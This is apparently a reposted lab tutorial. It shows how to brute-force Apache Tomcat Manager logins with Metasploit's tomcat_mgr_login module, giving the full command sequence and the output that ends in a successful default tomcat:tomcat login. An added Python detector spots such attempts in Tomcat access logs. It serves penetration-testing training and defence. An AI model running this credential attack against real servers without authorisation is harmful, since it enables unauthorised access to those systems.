  • Security Testing 18: Penetration Attack on the Tomcat Service

    1. Open the msfconsole console

    msfconsole

    2. Search for available Tomcat modules

    msf > search tomcat

    Here we choose the module auxiliary/scanner/http/tomcat_mgr_login

    3. Use the Tomcat manager login module to carry out the penetration attack by running the following command:

    msf6 > use auxiliary/scanner/http/tomcat_mgr_login

    4. View the available options of the tomcat_mgr_login module by running:

    msf auxiliary(scanner/http/tomcat_mgr_login) > show options 

    5. Specify the username and password files; the default paths are used here

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > 

    6. Specify the target server to attack

    msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

    7. Set the server port to 8180

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
    rport => 8180
    msf6 auxiliary(scanner/http/tomcat_mgr_login) > 

    8. Run the penetration program

    msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 
    
    [!] No active DB -- Credential data will not be saved!
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
    [-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
    [+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    The results show that the account and password found are tomcat, tomcat
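
From the defender's side, the run above leaves a recognizable trace in the Tomcat access log: a burst of 401 responses on the manager application from one source, then a 2xx once tomcat:tomcat is accepted. The following detector is an added example, not part of the original post; it assumes the AccessLogValve `common` pattern and the manager app under `/manager`, and the log lines, source addresses and timestamps are constructed.

```python
import re
from collections import defaultdict

# Constructed sample in Tomcat AccessLogValve "common" format
# (%h %l %u %t "%r" %s %b). Hosts, users and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Dec/2021:09:58:10 +0800] "GET /manager/html HTTP/1.1" 401 2474
10.0.0.5 - admin [22/Dec/2021:09:58:14 +0800] "GET /manager/html HTTP/1.1" 200 17211
192.168.52.128 - - [22/Dec/2021:10:00:01 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - - [22/Dec/2021:10:00:01 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - - [22/Dec/2021:10:00:02 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - - [22/Dec/2021:10:00:02 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - - [22/Dec/2021:10:00:03 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - - [22/Dec/2021:10:00:03 +0800] "GET /manager/html HTTP/1.1" 401 2474
192.168.52.128 - tomcat [22/Dec/2021:10:00:04 +0800] "GET /manager/html HTTP/1.1" 200 17211
10.0.0.9 - - [22/Dec/2021:10:00:05 +0800] "GET /index.jsp HTTP/1.1" 200 8133
"""

LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)

def detect_manager_bruteforce(log_text, path_prefix="/manager", min_failures=5):
    """Flag sources with >= min_failures 401s on the manager app and record
    the user name of the first 2xx that follows (None if guessing failed)."""
    failures = defaultdict(int)   # source -> count of 401 responses
    hits = {}                     # source -> authenticated user after the burst
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not m["path"].startswith(path_prefix):
            continue
        host, status = m["host"], int(m["status"])
        if status == 401:
            failures[host] += 1
        elif 200 <= status < 300 and failures[host] >= min_failures:
            hits.setdefault(host, m["user"])
    return [
        {"source": h, "failed": n, "compromised_user": hits.get(h)}
        for h, n in sorted(failures.items()) if n >= min_failures
    ]

if __name__ == "__main__":
    for finding in detect_manager_bruteforce(SAMPLE_LOG):
        print(finding)
```

The threshold matters because a browser's first unauthenticated request to the manager app also produces a single 401 before the administrator logs in, as the `10.0.0.5` lines show.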

  • Original article: https://www.cnblogs.com/tiechui2015/p/15715073.html